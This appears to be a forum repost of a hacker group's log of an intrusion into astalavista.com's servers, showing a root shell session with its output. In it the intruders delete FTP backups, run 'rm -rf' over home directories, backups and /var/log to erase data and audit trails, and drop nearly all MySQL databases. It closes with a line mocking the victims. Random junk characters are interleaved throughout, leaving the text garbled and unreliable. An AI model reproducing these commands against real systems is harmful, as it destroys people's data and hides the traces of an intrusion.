-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
5 W4 C: Y3 j+ E' q% J# A' p6 F-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
% ^4 [$ v9 S) p5 M[snip]6 M( E( x" U! j }8 F* X4 y
226 Transfer complete., o/ }% b/ A9 H5 g' g* F) Z' U
ftp> mdelete *
, I" i' y6 J9 E" H) k oftp> ls -la8 O+ q" ]- x E
227 Entering Passive Mode (212,254,194,163,2,193)# f# ?% n6 W( K3 r% {
150 Opening BINARY mode data connection for ‘file list’.
9 z) l6 N1 v; D226 Transfer complete.1 m3 }6 \1 H& S3 {
ftp>0 b9 w3 @! X. v5 W* l
# Z, `( Y2 c: |% o: `; g- U7 {
sh-3.2# cd /home
9 @% y% w1 `+ M# v' wsh-3.2# ls -la: c( s3 H8 Z+ `
total 120. Y6 e: A8 i3 o1 p x
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .; T1 G4 q3 t5 \9 a$ o* o
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
; H [( { D' U- E5 [6 \! O/ T7 Ldrwx–x–x 9 admin admin 4096 Nov 28 2007 admin3 W- j/ ^0 L- @& l' ?
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group1 z7 T) }, g7 W5 N* Y
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
. V( u' M% E7 H+ n+ odrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet/ c( d4 |; R: Y! ~$ E8 A: P% G
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
( l( j! K5 v' {3 h2 f. [/ Wdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
' t# x, k2 c; |drwx–x–x 10 com com 4096 Apr 28 12:40 com
$ z8 k. Z1 x- ?( z0 a! Adrwxr-xr-x 2 root root 4096 May 17 2007 ftp6 R. l# Y6 s1 _$ p" H0 Q# u; {- T
drwx—— 3 jon jon 4096 Sep 21 2007 jon
C* Q" c5 U0 gdrwx—— 2 root root 16384 Sep 11 2007 lost+found+ g7 _& |: y/ G
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
6 w; O' x) o- ldrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
- S: e5 |' M% idrwx—— 2 jon jon 4096 Sep 15 2007 test: m- Z9 N" K$ }1 k
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
- ]# F% J8 _: Z" m" t; G" E; A: _: c, [3 P3 X) k' _: \; ]( w
sh-3.2# rm -rf backup/. `! B2 A7 ?9 O$ x( |) Y/ M! c. o
sh-3.2# rm -rf backup.14161/
& e# N2 h. N. Q- t# C8 n# Rsh-3.2# rm -rf ftp/$ W: ?1 X: f! a' ]5 I" W; i
sh-3.2# rm -rf jon/0 l/ C; n, x. x5 V. C$ V
sh-3.2# rm -rf my/
" p* e( p/ l0 Y0 c' U, M0 Zsh-3.2# rm -rf mysqldata/
* ^ {! Q, D7 ]6 [, E+ csh-3.2# rm -rf test/
# ?" e1 N& Q* d* ?sh-3.2# rm -rf tmp/
3 N( Q8 f! Q i$ @sh-3.2# cd ~
& R! |3 j# c1 Fsh-3.2# rm -rf *
+ ]" `+ B/ B" x8 R2 t+ ?sh-3.2# rm -rf /var/log/
: L& F! x$ q$ G& q6 P5 W& r7 prm: cannot remove directory `/var/log//proftpd’: Directory not empty3 K& q6 d7 i( [% p# l: y3 ?
sh-3.2# rm -rf /home/*
' I9 I* l1 ]. i6 M0 M3 b( t/ d% Csh-3.2# mysql! O1 _! X5 ~& p( j- l
Welcome to the MySQL monitor. Commands end with ; or \g.
" d0 C7 `' ?+ c7 p' h' ?+ oYour MySQL connection id is 407156
* N P4 E$ I+ Q6 UServer version: 5.0.45-community-log MySQL Community Edition (GPL)6 [ ^7 w# E) w' I6 n+ e
: w" a" R! g+ r6 Z. ]+ V
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
3 D* {" V! |4 R0 q W3 [7 X$ v7 i# V& j- L- q( h
mysql> show databases;. L) h6 L( z7 x( u
+———————–+! u l# `1 K' v! }6 }0 m+ W
| Database |
5 q* O4 w& Z% v2 [6 y+———————–+
8 X) N% T- e' x( ^: Y# E| information_schema |3 r1 i; c( L& f; |% \
| astanet_ads |
. ]& V, s6 @8 N| astanet_mailing_lists |
& t+ a7 r8 W8 c( b# t4 W4 s| astanet_mediawiki |& }* J Z& j9 S% k, L6 B3 S
| astanet_membersystem |, w. R# c. M( G
| com_contrexx |
3 y) b) t0 V5 K* l1 v| com_contrexx2 | [; O. o% Q! z4 Y) v K
| com_contrexx2_live |( S' i; S7 w' F! {5 i6 n
| da_roundcube |
1 W2 Q% `+ P" A5 C! c8 z| dolphin |& x6 p3 p! M6 ^% t; b8 a
| ideapool |
6 r. I& L( g, C8 |4 c/ `/ L| mysql |, R a5 g( X$ O5 w% s
| test |3 I/ W0 k6 ?$ f' M# B$ |! n
| yourmaster |: E+ s9 u+ G4 Y) F$ W* C- Q
+———————–+
3 V" W# M' K r) U$ ]9 d3 G: r14 rows in set (0.03 sec)/ _3 q6 M/ \' T9 e/ A" }
w! L9 x3 \2 q' h- ]9 n1 L
mysql> drop database astanet_membersystem;
; S: a8 \: d' |' @" l9 l0 wdroQuery OK, 46 rows affected (0.81 sec)
) [' l& w- G* i" s& ~
( \9 R z! {; }1 h3 R) d* s5 _3 ^mysql> drop database com_contrexx; g2 B) n+ g4 ?2 y! B
Query OK, 211 rows affected (2.72 sec)
- [" @ K. U c: Q. p" i. q
5 o; P" J; L1 g% D9 o: I, _mysql> drop database com_contrexx2;. Z! @" n, y5 X' }
Query OK, 237 rows affected (2.23 sec)
( E [9 s1 U/ F( o, h4 j% K5 u: j) Y: R/ |7 ^$ u
mysql> drop database com_contrexx2_live;
$ o- |; f! D' m( x4 q4 V3 X# \2 GQuery OK, 227 rows affected (7.63 sec)
* s1 T o% H6 o9 d. ^# x4 n, t$ c: W, {
mysql> drop database ideapool;
# l2 f& R% W3 f% H; X- ZQuery OK, 69 rows affected (0.19 sec)
" ]: k. e9 H1 J6 N. k
+ q# a- f% v& J- I, u: D( e5 g5 B# Ymysql> drop database yourmaster;+ L* X; v3 q: L$ w" z; \% c
Query OK, 158 rows affected (0.55 sec)5 S1 z' e1 i9 N% k& n
2 T7 [& H {2 {0 O
mysql> drop database astanet_ads;
" j7 P: j* Z/ m+ Y' ~* HQuery OK, 9 rows affected (0.11 sec); E2 R0 U8 h, k7 D& L' Q
5 w* \& I5 O+ j" emysql> drop database astanet_mailing_lists;0 o- o H- L. ]$ [( I
Query OK, 24 rows affected (1.47 sec)* |* Q: C6 X& Z6 _1 s" r, K2 B
~8 h$ ` j! Zmysql> drop database astanet_mediawiki;
- ~% {0 \7 D, @/ r5 f# uQuery OK, 31 rows affected (0.51 sec)2 p- ?! z* b( N, C6 B" y4 C5 F6 j
" r! g8 M' P# ?3 j2 k+ L! h% ^. Z9 ~, T( kmysql> show databases;
8 v2 |. g1 c1 J j$ C/ r0 n- c$ O+——————–+
$ y+ ]7 n5 T: u+ s5 ~0 |' I| Database |
2 k' z, k9 C; Y6 l6 F' m; \+——————–+
9 Y5 s4 {, G& Y- B+ r7 M| information_schema |
# k) d6 ?: h: U/ }6 z# a| da_roundcube |1 u# W. F" \3 c+ u" `
| dolphin |
3 f# X3 H3 ] `6 w7 W, y6 o| mysql |& r, I w3 G5 h D
| test |
$ u" G5 W1 {, X( K- J% V& K+ C7 Z+——————–+6 s% m; r# _0 n& p: d( H
5 rows in set (0.00 sec)
O3 {- S8 E& w
$ o/ s' p6 J$ `( FWhat a journey! We’re not sure exactly why the “Terminator” had any influence on, m7 l4 b+ F) e# }7 F ~
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the' |$ |* d$ `. [+ \
wrong to say this pack of morons *wont be back*.
7 R9 d( x0 q2 z& C |
发表于 2012-11-6 21:07:34
收藏
支持
反对